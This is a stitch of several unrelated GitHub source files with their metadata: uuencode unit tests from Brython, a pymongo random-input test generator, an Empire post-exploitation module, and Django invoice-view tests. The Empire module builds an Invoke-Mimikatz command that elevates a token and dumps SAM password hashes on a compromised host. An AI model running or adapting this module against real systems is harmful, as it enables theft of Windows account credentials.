self._encoding = encoding
self._errors = errors
if initial_value:
if not isinstance(initial_value, str):
initial_value = str(initial_value)
self.write(initial_value)
self.seek(0)
def getvalue(self):
self.flush()
return self.buffer.getvalue().decode(self._encoding, self._errors)
def encodedtextwrapped(mode, filename, backtick=False):
if backtick:
res = (bytes("begin %03o %s\n" % (mode, filename), "ascii") +
encodedtext.replace(b' ', b'`') + b"\n`\nend\n")
else:
res = (bytes("begin %03o %s\n" % (mode, filename), "ascii") +
encodedtext + b"\n \nend\n")
return res
class UUTest(unittest.TestCase):
def test_encode(self):
inp = io.BytesIO(plaintext)
out = io.BytesIO()
uu.encode(inp, out, "t1")
self.assertEqual(out.getvalue(), encodedtextwrapped(0o666, "t1"))
inp = io.BytesIO(plaintext)
out = io.BytesIO()
uu.encode(inp, out, "t1", 0o644)
self.assertEqual(out.getvalue(), encodedtextwrapped(0o644, "t1"))
inp = io.BytesIO(plaintext)
out = io.BytesIO()
uu.encode(inp, out, "t1", backtick=True)
self.assertEqual(out.getvalue(), encodedtextwrapped(0o666, "t1", True))
with self.assertRaises(TypeError):
uu.encode(inp, out, "t1", 0o644, True)
def test_decode(self):
for backtick in True, False:
inp = io.BytesIO(encodedtextwrapped(0o666, "t1", backtick=backtick))
out = io.BytesIO()
uu.decode(inp, out)
self.assertEqual(out.getvalue(), plaintext)
inp = io.BytesIO(
b"UUencoded files may contain many lines,\n" +
b"even some that have 'begin' in them.\n" +
encodedtextwrapped(0o666, "t1", backtick=backtick)
)
out = io.BytesIO()
uu.decode(inp, out)
self.assertEqual(out.getvalue(), plaintext)
def test_truncatedinput(self):
inp = io.BytesIO(b"begin 644 t1\n" + encodedtext)
out = io.BytesIO()
try:
uu.decode(inp, out)
self.fail("No exception raised")
except uu.Error as e:
self.assertEqual(str(e), "Truncated input file")
def test_missingbegin(self):
inp = io.BytesIO(b"")
out = io.BytesIO()
try:
uu.decode(inp, out)
self.fail("No exception raised")
except uu.Error as e:
self.assertEqual(str(e), "No valid begin line found in input file")
def test_garbage_padding(self):
# Issue #22406
encodedtext1 = (
b"begin 644 file\n"
# length 1; bits 001100 111111 111111 111111
b"\x21\x2C\x5F\x5F\x5F\n"
b"\x20\n"
b"end\n"
)
encodedtext2 = (
b"begin 644 file\n"
# length 1; bits 001100 111111 111111 111111
b"\x21\x2C\x5F\x5F\x5F\n"
b"\x60\n"
b"end\n"
)
plaintext = b"\x33" # 00110011
for encodedtext in encodedtext1, encodedtext2:
with self.subTest("uu.decode()"):
inp = io.BytesIO(encodedtext)
out = io.BytesIO()
uu.decode(inp, out, quiet=True)
self.assertEqual(out.getvalue(), plaintext)
with self.subTest("uu_codec"):
import codecs
decoded = codecs.decode(encodedtext, "uu_codec")
self.assertEqual(decoded, plaintext)
class UUStdIOTest(unittest.TestCase):
def setUp(self):
self.stdin = sys.stdin
self.stdout = sys.stdout
def tearDown(self):
sys.stdin = self.stdin
sys.stdout = self.stdout
def test_encode(self):
sys.stdin = FakeIO(plaintext.decode("ascii"))
sys.stdout = FakeIO()
uu.encode("-", "-", "t1", 0o666)
self.assertEqual(sys.stdout.getvalue(),
encodedtextwrapped(0o666, "t1").decode("ascii"))
def test_decode(self):
sys.stdin = FakeIO(encodedtextwrapped(0o666, "t1").decode("ascii"))
sys.stdout = FakeIO()
uu.decode("-", "-")
stdout = sys.stdout
sys.stdout = self.stdout
sys.stdin = self.stdin
self.assertEqual(stdout.getvalue(), plaintext.decode("ascii"))
class UUFileTest(unittest.TestCase):
def setUp(self):
self.tmpin = support.TESTFN + "i"
self.tmpout = support.TESTFN + "o"
self.addCleanup(support.unlink, self.tmpin)
self.addCleanup(support.unlink, self.tmpout)
def test_encode(self):
with open(self.tmpin, 'wb') as fin:
fin.write(plaintext)
with open(self.tmpin, 'rb') as fin:
with open(self.tmpout, 'wb') as fout:
uu.encode(fin, fout, self.tmpin, mode=0o644)
with open(self.tmpout, 'rb') as fout:
s = fout.read()
self.assertEqual(s, encodedtextwrapped(0o644, self.tmpin))
# in_file and out_file as filenames
uu.encode(self.tmpin, self.tmpout, self.tmpin, mode=0o644)
with open(self.tmpout, 'rb') as fout:
s = fout.read()
self.assertEqual(s, encodedtextwrapped(0o644, self.tmpin))
def test_decode(self):
with open(self.tmpin, 'wb') as f:
f.write(encodedtextwrapped(0o644, self.tmpout))
with open(self.tmpin, 'rb') as f:
uu.decode(f)
with open(self.tmpout, 'rb') as f:
s = f.read()
self.assertEqual(s, plaintext)
# XXX is there an xp way to verify the mode?
def test_decode_filename(self):
with open(self.tmpin, 'wb') as f:
f.write(encodedtextwrapped(0o644, self.tmpout))
uu.decode(self.tmpin)
with open(self.tmpout, 'rb') as f:
s = f.read()
self.assertEqual(s, plaintext)
def test_decodetwice(self):
# Verify that decode() will refuse to overwrite an existing file
with open(self.tmpin, 'wb') as f:
f.write(encodedtextwrapped(0o644, self.tmpout))
with open(self.tmpin, 'rb') as f:
uu.decode(f)
with open(self.tmpin, 'rb') as f:
self.assertRaises(uu.Error, uu.decode, f)
def test_decode_mode(self):
# Verify that decode() will set the given mode for the out_file
expected_mode = 0o444
with open(self.tmpin, 'wb') as f:
f.write(encodedtextwrapped(expected_mode, self.tmpout))
# make file writable again, so it can be removed (Windows only)
self.addCleanup(os.chmod, self.tmpout, expected_mode | stat.S_IWRITE)
with open(self.tmpin, 'rb') as f:
uu.decode(f)
self.assertEqual(
stat.S_IMODE(os.stat(self.tmpout).st_mode),
expected_mode
)
if __name__=="__main__":
unittest.main()
|
{
"content_hash": "7df45e18d93bebbc8a4af907b739b33c",
"timestamp": "",
"source": "github",
"line_count": 242,
"max_line_length": 80,
"avg_line_length": 32.52066115702479,
"alnum_prop": 0.559720457433291,
"repo_name": "kikocorreoso/brython",
"id": "c9f05e5b760d922cfaddf4a509d2fbc317b8b97f",
"size": "7870",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "www/src/Lib/test/test_uu.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "21158"
},
{
"name": "HTML",
"bytes": "5011615"
},
{
"name": "JavaScript",
"bytes": "7230101"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Python",
"bytes": "19224768"
},
{
"name": "Roff",
"bytes": "21126"
},
{
"name": "VBScript",
"bytes": "481"
}
],
"symlink_target": ""
}
|
import random
import traceback
import datetime
import re
import sys
sys.path[0:0] = [""]
from bson.binary import Binary
from bson.dbref import DBRef
from bson.objectid import ObjectId
from bson.son import SON
gen_target = 100
reduction_attempts = 10
examples = 5
def lift(value):
return lambda: value
def choose_lifted(generator_list):
return lambda: random.choice(generator_list)
def map(generator, function):
return lambda: function(generator())
def choose(list):
return lambda: random.choice(list)()
def gen_range(start, stop):
return lambda: random.randint(start, stop)
def gen_int():
max_int = 2147483647
return lambda: random.randint(-max_int - 1, max_int)
def gen_float():
return lambda: (random.random() - 0.5) * sys.maxint
def gen_boolean():
return lambda: random.choice([True, False])
def gen_printable_char():
return lambda: chr(random.randint(32, 126))
def gen_printable_string(gen_length):
return lambda: "".join(gen_list(gen_printable_char(), gen_length)())
def gen_char(set=None):
return lambda: chr(random.randint(0, 255))
def gen_string(gen_length):
return lambda: "".join(gen_list(gen_char(), gen_length)())
def gen_unichar():
return lambda: unichr(random.randint(1, 0xFFF))
def gen_unicode(gen_length):
return lambda: u"".join([x for x in
gen_list(gen_unichar(), gen_length)() if
x not in ".$"])
def gen_list(generator, gen_length):
return lambda: [generator() for _ in range(gen_length())]
def gen_datetime():
return lambda: datetime.datetime(random.randint(1970, 2037),
random.randint(1, 12),
random.randint(1, 28),
random.randint(0, 23),
random.randint(0, 59),
random.randint(0, 59),
random.randint(0, 999) * 1000)
def gen_dict(gen_key, gen_value, gen_length):
def a_dict(gen_key, gen_value, length):
result = {}
for _ in range(length):
result[gen_key()] = gen_value()
return result
return lambda: a_dict(gen_key, gen_value, gen_length())
def gen_regexp(gen_length):
# TODO our patterns only consist of one letter.
# this is because of a bug in CPython's regex equality testing,
# which I haven't quite tracked down, so I'm just ignoring it...
pattern = lambda: u"".join(gen_list(choose_lifted(u"a"), gen_length)())
def gen_flags():
flags = 0
if random.random() > 0.5:
flags = flags | re.IGNORECASE
if random.random() > 0.5:
flags = flags | re.MULTILINE
if random.random() > 0.5:
flags = flags | re.VERBOSE
return flags
return lambda: re.compile(pattern(), gen_flags())
def gen_objectid():
return lambda: ObjectId()
def gen_dbref():
collection = gen_unicode(gen_range(0, 20))
return lambda: DBRef(collection(), gen_mongo_value(1, True)())
def gen_mongo_value(depth, ref):
choices = [gen_unicode(gen_range(0, 50)),
gen_printable_string(gen_range(0, 50)),
map(gen_string(gen_range(0, 1000)), Binary),
gen_int(),
gen_float(),
gen_boolean(),
gen_datetime(),
gen_objectid(),
lift(None)]
if ref:
choices.append(gen_dbref())
if depth > 0:
choices.append(gen_mongo_list(depth, ref))
choices.append(gen_mongo_dict(depth, ref))
return choose(choices)
def gen_mongo_list(depth, ref):
return gen_list(gen_mongo_value(depth - 1, ref), gen_range(0, 10))
def gen_mongo_dict(depth, ref=True):
return map(gen_dict(gen_unicode(gen_range(0, 20)),
gen_mongo_value(depth - 1, ref),
gen_range(0, 10)), SON)
def simplify(case): # TODO this is a hack
if isinstance(case, SON) and "$ref" not in case:
simplified = SON(case) # make a copy!
if random.choice([True, False]):
# delete
if not len(simplified.keys()):
return (False, case)
del simplified[random.choice(simplified.keys())]
return (True, simplified)
else:
# simplify a value
if not len(simplified.items()):
return (False, case)
(key, value) = random.choice(simplified.items())
(success, value) = simplify(value)
simplified[key] = value
return (success, success and simplified or case)
if isinstance(case, list):
simplified = list(case)
if random.choice([True, False]):
# delete
if not len(simplified):
return (False, case)
simplified.pop(random.randrange(len(simplified)))
return (True, simplified)
else:
# simplify an item
if not len(simplified):
return (False, case)
index = random.randrange(len(simplified))
(success, value) = simplify(simplified[index])
simplified[index] = value
return (success, success and simplified or case)
return (False, case)
def reduce(case, predicate, reductions=0):
for _ in range(reduction_attempts):
(reduced, simplified) = simplify(case)
if reduced and not predicate(simplified):
return reduce(simplified, predicate, reductions + 1)
return (reductions, case)
def isnt(predicate):
return lambda x: not predicate(x)
def check(predicate, generator):
counter_examples = []
for _ in range(gen_target):
case = generator()
try:
if not predicate(case):
reduction = reduce(case, predicate)
counter_examples.append("after %s reductions: %r" % reduction)
except:
counter_examples.append("%r : %s" % (case, traceback.format_exc()))
return counter_examples
def check_unittest(test, predicate, generator):
counter_examples = check(predicate, generator)
if counter_examples:
failures = len(counter_examples)
message = "\n".join([" -> %s" % f for f in
counter_examples[:examples]])
message = ("found %d counter examples, displaying first %d:\n%s" %
(failures, min(failures, examples), message))
test.fail(message)
|
{
"content_hash": "4e95c97c1be2b24ca237e00e7067251a",
"timestamp": "",
"source": "github",
"line_count": 226,
"max_line_length": 79,
"avg_line_length": 29.013274336283185,
"alnum_prop": 0.5758731127039804,
"repo_name": "marcosleonefilho/hoop-pymongo",
"id": "b653f10df98bdbdd77cd0f938898f8cc46d752f4",
"size": "7134",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "test/qcheck.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "100460"
},
{
"name": "Python",
"bytes": "492907"
},
{
"name": "Shell",
"bytes": "3073"
}
],
"symlink_target": ""
}
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz SAM dump',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to extract hashes from the Security Account Managers "
"(SAM) database."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com',
"https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa"
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
script += "Invoke-Mimikatz -Command "
script += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';"
return script
|
{
"content_hash": "a0046b792ae01adb8e5d5be009c7d34c",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 104,
"avg_line_length": 29.493333333333332,
"alnum_prop": 0.5022603978300181,
"repo_name": "rvazarkar/Empire",
"id": "45773d89f79f1fbe36e5070315cb50e69a18d6c4",
"size": "2212",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/modules/credentials/mimikatz/sam.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "PHP",
"bytes": "2563"
},
{
"name": "PowerShell",
"bytes": "4057571"
},
{
"name": "Python",
"bytes": "640506"
},
{
"name": "Shell",
"bytes": "977"
}
],
"symlink_target": ""
}
|
import datetime
from dateutil.relativedelta import relativedelta
import random
from six.moves.urllib.parse import urlencode
from django.contrib.auth.models import Permission
from django.core.urlresolvers import reverse
from django.test import TestCase
from timepiece import utils
from timepiece.forms import DATE_FORM_FORMAT
from timepiece.tests import factories
from timepiece.tests.base import ViewTestMixin, LogTimeMixin
from timepiece.contracts.models import EntryGroup, HourGroup
from timepiece.crm.models import Attribute
from timepiece.entries.models import Activity, Entry
class TestListInvoicesView(ViewTestMixin, TestCase):
url_name = 'list_invoices'
template_name = 'timepiece/invoice/list.html'
factory = factories.EntryGroup
model = EntryGroup
def setUp(self):
super(TestListInvoicesView, self).setUp()
self.permissions = [Permission.objects.get(codename='add_entrygroup')]
self.user = factories.User(permissions=self.permissions)
self.login_user(self.user)
def test_get_no_permission(self):
"""Permission is required for this view."""
self.user.user_permissions.clear()
response = self._get()
self.assertRedirectsToLogin(response)
def test_list_all(self):
"""If no filters are provided, all objects should be listed."""
object_list = [self.factory.create() for i in range(3)]
response = self._get()
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, self.template_name)
self.assertEquals(response.context['object_list'].count(), 3)
for obj in object_list:
self.assertTrue(obj in response.context['object_list'])
def test_list_one(self):
"""Page should render if there is one object & no search query."""
obj = self.factory.create()
response = self._get()
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, self.template_name)
self.assertEquals(response.context['object_list'].count(), 1)
self.assertEquals(response.context['object_list'].get(), obj)
def test_no_results(self):
"""Page should render if there are no search results."""
self.factory.create()
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, self.template_name)
self.assertEquals(response.context['object_list'].count(), 0)
def test_one_result(self):
"""Page should render if there is only one search result."""
obj = self.factory.create(comments='hello')
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, self.template_name)
self.assertEquals(response.context['object_list'].count(), 1)
self.assertEquals(response.context['object_list'].get(), obj)
def test_multiple_results(self):
"""Page should render if there are multiple search results."""
obj_list = [self.factory.create(comments='hello') for i in range(2)]
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, self.template_name)
self.assertEquals(response.context['object_list'].count(), 2)
for obj in obj_list:
self.assertTrue(obj in response.context['object_list'])
def test_filter_number(self):
"""User should be able to filter by search query."""
obj = self.factory.create(number='hello')
self.factory.create()
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertEquals(response.context['object_list'].get(), obj)
def test_filter_comments(self):
"""User should be able to filter by search query."""
obj = self.factory.create(comments='hello')
self.factory.create()
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertEquals(response.context['object_list'].get(), obj)
def test_filter_project_name(self):
"""User should be able to filter by search query."""
obj = self.factory.create(project__name='hello')
self.factory.create()
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertEquals(response.context['object_list'].get(), obj)
def test_filter_user_username(self):
"""User should be able to filter by search query."""
obj = self.factory.create(user__username='hello')
self.factory.create()
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertEquals(response.context['object_list'].get(), obj)
class InvoiceViewPreviousTestCase(ViewTestMixin, LogTimeMixin, TestCase):
def setUp(self):
super(InvoiceViewPreviousTestCase, self).setUp()
self.user = factories.Superuser()
self.login_user(self.user)
self.devl_activity = factories.Activity(
code='devl', name='development', billable=True)
self.activity = factories.Activity(
code='WRK', name='Work')
# Make some projects and entries for invoice creation
self.project = factories.BillableProject()
self.project2 = factories.BillableProject()
last_start = self.log_many([self.project, self.project2])
# Add some non-billable entries
self.log_many([self.project, self.project2], start=last_start,
billable=False)
self.create_invoice(self.project, {'static': EntryGroup.INVOICED})
self.create_invoice(self.project2, {'status': EntryGroup.NOT_INVOICED})
def get_create_url(self, **kwargs):
base_url = reverse('create_invoice')
params = urlencode(kwargs)
return '{0}?{1}'.format(base_url, params)
def log_many(self, projects, num_entries=20, start=None, billable=True):
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 0, 0, 0))
for index in range(0, num_entries):
start += relativedelta(hours=(5 * index))
project = projects[index % len(projects)] # Alternate projects
self.log_time(start=start, status=Entry.APPROVED, project=project,
billable=billable)
return start
def create_invoice(self, project=None, data=None):
data = data or {}
if not project:
project = self.project
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
url = self.get_create_url(project=project.id, to_date=to_date.strftime('%Y-%m-%d'))
params = {
'number': str(random.randint(999, 9999)),
'status': EntryGroup.INVOICED,
}
params.update(data)
self.client.post(url, params)
def get_invoice(self):
invoices = EntryGroup.objects.all()
return random.choice(invoices)
def get_entry(self, invoice):
entries = invoice.entries.all()
return random.choice(entries)
def test_previous_invoice_list_no_search(self):
url = reverse('list_invoices')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
invoices = response.context['object_list']
self.assertEqual(len(invoices), 2)
def test_previous_invoice_list_search(self):
def search(query):
response = self.client.get(list_url, data={'search': query})
return response.context['object_list']
list_url = reverse('list_invoices')
project3 = factories.BillableProject(name=':-D')
self.log_many([project3], 10)
self.create_invoice(project=project3, data={
'status': EntryGroup.INVOICED,
'comments': 'comment!',
'number': '###',
})
# Search comments, project name, and number.
for query in ['comment!', ':-D', '###']:
results = search(query)
self.assertEqual(len(results), 1)
self.assertEqual(results[0].project, project3)
# Search in username
results = search(self.user.username)
self.assertEqual(len(results), 3) # all were created by this user
# No results
results = search("You won't find me here")
self.assertEquals(len(results), 0)
def test_invoice_detail(self):
invoices = EntryGroup.objects.all()
for invoice in invoices:
url = reverse('view_invoice', args=[invoice.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTrue(response.context['invoice'])
def test_invoice_csv(self):
invoice = self.get_invoice()
url = reverse('view_invoice_csv', args=[invoice.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
data = dict(response.items())
self.assertEqual(data['Content-Type'], 'text/csv')
disposition = data['Content-Disposition']
self.assertTrue(disposition.startswith('attachment; filename=Invoice'))
contents = response.content.decode('utf-8').splitlines()
# TODO: Possibly find a meaningful way to test contents
# Pull off header line and totals line
contents.pop(0) # header
contents.pop() # totals
num_entries = invoice.entries.all().count()
self.assertEqual(num_entries, len(contents))
def test_invoice_csv_bad_id(self):
url = reverse('view_invoice_csv', args=[9999999999])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_invoice_edit_get(self):
invoice = self.get_invoice()
url = reverse('edit_invoice', args=[invoice.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['invoice'].id, invoice.id)
self.assertTrue(response.context['entries'])
def test_invoice_edit_bad_id(self):
url = reverse('edit_invoice', args=[99999999999])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_invoice_edit_post(self):
invoice = self.get_invoice()
url = reverse('edit_invoice', args=(invoice.id,))
if invoice.status != EntryGroup.INVOICED:
status = EntryGroup.INVOICED
else:
status = EntryGroup.NOT_INVOICED
params = {
'number': int(invoice.number) + 1,
'status': status,
'comments': 'Comments',
}
response = self.client.post(url, params)
self.assertEqual(response.status_code, 302)
new_invoice = EntryGroup.objects.get(pk=invoice.id)
self.assertEqual(int(invoice.number) + 1, int(new_invoice.number))
self.assertTrue(invoice.status != new_invoice.status)
self.assertEqual(new_invoice.comments, 'Comments')
def test_invoice_edit_bad_post(self):
invoice = self.get_invoice()
url = reverse('edit_invoice', args=[invoice.id])
params = {
'number': '2',
'status': 'not_in_choices',
}
response = self.client.post(url, params)
err_msg = 'Select a valid choice. not_in_choices is not one of ' + \
'the available choices.'
self.assertFormError(response, 'invoice_form', 'status', err_msg)
def test_invoice_delete_get(self):
invoice = self.get_invoice()
url = reverse('delete_invoice', args=[invoice.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_invoice_delete(self):
invoice = self.get_invoice()
entry_ids = [entry.pk for entry in invoice.entries.all()]
url = reverse('delete_invoice', args=[invoice.id])
response = self.client.post(url, {'delete': 'delete'})
self.assertEqual(response.status_code, 302)
self.assertFalse(EntryGroup.objects.filter(pk=invoice.id))
entries = Entry.objects.filter(pk__in=entry_ids)
for entry in entries:
self.assertEqual(entry.status, Entry.APPROVED)
def test_invoice_delete_cancel(self):
invoice = self.get_invoice()
url = reverse('delete_invoice', args=[invoice.id])
response = self.client.post(url, {'cancel': 'cancel'})
self.assertEqual(response.status_code, 302)
# Canceled out so the invoice was not deleted
self.assertTrue(EntryGroup.objects.get(pk=invoice.id))
def test_invoice_delete_bad_args(self):
self.get_invoice()
url = reverse('delete_invoice', args=[1232345345])
response = self.client.post(url, {'delete': 'delete'})
self.assertEqual(response.status_code, 404)
def test_rm_invoice_entry_get(self):
invoice = self.get_invoice()
entry = self.get_entry(invoice)
url = reverse('delete_invoice_entry', args=[invoice.id, entry.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['invoice'], invoice)
self.assertEqual(response.context['entry'], entry)
def test_rm_invoice_entry_get_bad_id(self):
invoice = self.get_invoice()
entry = self.get_entry(invoice)
url = reverse('delete_invoice_entry', args=[invoice.id, 999999])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
url = reverse('delete_invoice_entry', args=[9999, entry.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_rm_invoice_entry_post(self):
invoice = self.get_invoice()
entry = self.get_entry(invoice)
url = reverse('delete_invoice_entry', args=[invoice.id, entry.id])
response = self.client.post(url, {'submit': ''})
self.assertEqual(response.status_code, 302)
new_invoice = EntryGroup.objects.get(pk=invoice.pk)
rm_entry = new_invoice.entries.filter(pk=entry.id)
self.assertFalse(rm_entry)
new_entry = Entry.objects.get(pk=entry.pk)
self.assertEqual(new_entry.status, Entry.APPROVED)
self.assertEqual(new_entry.entry_group, None)
class InvoiceCreateTestCase(ViewTestMixin, TestCase):
def setUp(self):
super(InvoiceCreateTestCase, self).setUp()
self.user = factories.Superuser()
self.login_user(self.user)
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 8))
end = utils.add_timezone(datetime.datetime(2011, 1, 1, 12))
self.project_billable = factories.BillableProject()
self.project_billable2 = factories.BillableProject()
self.project_non_billable = factories.NonbillableProject()
self.entry1 = factories.Entry(
user=self.user, project=self.project_billable,
activity=factories.Activity(billable=True),
start_time=start, end_time=end, status=Entry.APPROVED)
self.entry2 = factories.Entry(
user=self.user, project=self.project_billable,
activity=factories.Activity(billable=True),
start_time=start - relativedelta(days=5),
end_time=end - relativedelta(days=5), status=Entry.APPROVED)
self.entry3 = factories.Entry(
user=self.user, project=self.project_billable2,
activity=factories.Activity(billable=False),
start_time=start - relativedelta(days=10),
end_time=end - relativedelta(days=10), status=Entry.APPROVED)
self.entry4 = factories.Entry(
user=self.user, project=self.project_non_billable,
start_time=start + relativedelta(hours=11),
end_time=end + relativedelta(hours=15), status=Entry.APPROVED)
def get_create_url(self, **kwargs):
base_url = reverse('create_invoice')
params = urlencode(kwargs)
return '{0}?{1}'.format(base_url, params)
def make_hourgroups(self):
"""
Make several hour groups, one for each activity, and one that contains
all activities to check for hour groups with multiple activities.
"""
all_activities = Activity.objects.all()
for activity in all_activities:
hg = HourGroup.objects.create(name=activity.name)
hg.activities.add(activity)
def login_with_permission(self):
"""Helper to login as user with correct permissions"""
generate_invoice = Permission.objects.get(
codename='generate_project_invoice')
user = factories.User()
user.user_permissions.add(generate_invoice)
def test_invoice_confirm_view_user(self):
"""A regular user should not be able to access this page"""
self.login_user(factories.User())
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
url = self.get_create_url(
project=self.project_billable.pk,
to_date=to_date.strftime(DATE_FORM_FORMAT))
response = self.client.get(url)
self.assertEquals(response.status_code, 403)
def test_invoice_confirm_view_permission(self):
"""
If you have the correct permission, you should be
able to create an invoice
"""
self.login_with_permission()
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
url = self.get_create_url(
project=self.project_billable.pk,
to_date=to_date.strftime(DATE_FORM_FORMAT))
response = self.client.get(url)
self.assertEquals(response.status_code, 200)
def test_invoice_confirm_view(self):
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
url = self.get_create_url(
project=self.project_billable.pk,
to_date=to_date.strftime(DATE_FORM_FORMAT))
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
to_date_str = response.context['to_date'].strftime('%Y %m %d')
self.assertEqual(to_date_str, '2011 01 31')
# View can also take from date
from_date = utils.add_timezone(datetime.datetime(2011, 1, 1))
kwargs = {
'project': self.project_billable.id,
'to_date': to_date.strftime(DATE_FORM_FORMAT),
'from_date': from_date.strftime(DATE_FORM_FORMAT),
}
url = self.get_create_url(**kwargs)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
from_date_str = response.context['from_date'].strftime('%Y %m %d')
to_date_str = response.context['to_date'].strftime('%Y %m %d')
self.assertEqual(from_date_str, '2011 01 01')
self.assertEqual(to_date_str, '2011 01 31')
def test_invoice_confirm_totals(self):
"""Verify that the per activity totals are valid."""
# Make a few extra entries to test per activity totals
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 8))
end = utils.add_timezone(datetime.datetime(2011, 1, 1, 12))
# start = utils.add_timezone(datetime.datetime.now())
# end = start + relativedelta(hours=4)
activity = factories.Activity(billable=True, name='activity1')
for num in range(0, 4):
factories.Entry(
user=self.user, project=self.project_billable,
start_time=start - relativedelta(days=num),
end_time=end - relativedelta(days=num),
status=Entry.APPROVED, activity=activity)
self.make_hourgroups()
to_date = datetime.datetime(2011, 1, 31)
kwargs = {
'project': self.project_billable.id,
'to_date': to_date.strftime(DATE_FORM_FORMAT),
}
url = self.get_create_url(**kwargs)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
for name, hours_activities in response.context['billable_totals']:
total, activities = hours_activities
if name == 'activity1':
self.assertEqual(total, 16)
self.assertEqual(total, activities[0][1])
self.assertEqual(name, activities[0][0])
elif name == 'Total':
self.assertEqual(total, 24)
self.assertEqual(activities, [])
else:
# Each other activity is 4 hrs each
self.assertEqual(total, 4)
self.assertEqual(total, activities[0][1])
self.assertEqual(name, activities[0][0])
def test_invoice_confirm_bad_args(self):
# A year/month/project with no entries should raise a 404
kwargs = {
'project': self.project_billable.id,
'to_date': '2008-01-13',
}
url = self.get_create_url(**kwargs)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
# A year/month with bad/overflow values should raise a 404
kwargs = {
'project': self.project_billable.id,
'to_date': '9999-13-01',
}
url = self.get_create_url(**kwargs)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_make_invoice(self):
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
kwargs = {
'project': self.project_billable.id,
'to_date': to_date.strftime(DATE_FORM_FORMAT),
}
url = self.get_create_url(**kwargs)
response = self.client.post(url, {
'number': '3',
'status': EntryGroup.INVOICED,
})
self.assertEqual(response.status_code, 302)
# Verify an invoice was created with the correct attributes
invoice = EntryGroup.objects.get(number=3)
self.assertEqual(invoice.project.id, self.project_billable.id)
self.assertEqual(invoice.start, None)
self.assertEqual(invoice.end.strftime('%Y %m %d'), '2011 01 31')
self.assertEqual(len(invoice.entries.all()), 2)
# Verify that the entries were invoiced appropriately
# and the unrelated entries were untouched
entries = Entry.objects.all()
invoiced = entries.filter(status=EntryGroup.INVOICED)
for entry in invoiced:
self.assertEqual(entry.entry_group_id, invoice.id)
approved = entries.filter(status=Entry.APPROVED)
self.assertEqual(len(approved), 2)
self.assertEqual(approved[0].entry_group_id, None)
def test_make_invoice_with_from_uninvoiced(self):
from_date = utils.add_timezone(datetime.datetime(2011, 1, 1))
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
kwargs = {
'project': self.project_billable.id,
'to_date': to_date.strftime(DATE_FORM_FORMAT),
'from_date': from_date.strftime(DATE_FORM_FORMAT),
}
url = self.get_create_url(**kwargs)
response = self.client.post(url, {'number': '5',
'status': EntryGroup.NOT_INVOICED})
self.assertEqual(response.status_code, 302)
# Verify an invoice was created with the correct attributes
invoice = EntryGroup.objects.get(number=5)
self.assertEqual(invoice.project.id, self.project_billable.id)
self.assertEqual(invoice.start.strftime('%Y %m %d'), '2011 01 01')
